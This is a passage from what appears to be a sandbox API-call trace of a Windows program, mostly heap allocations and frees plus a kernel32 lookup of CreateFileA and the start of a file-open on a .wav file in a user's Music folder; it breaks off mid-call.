lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.691] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.691] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.691] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.691] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.692] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.695] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.697] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8f8 [0038.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.697] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0038.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c8f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.698] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0038.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x47) returned 0x88e138 [0038.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", cchWideChar=71, lpMultiByteStr=0x88e138, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", lpUsedDefaultChar=0x0) returned 71 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.699] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS 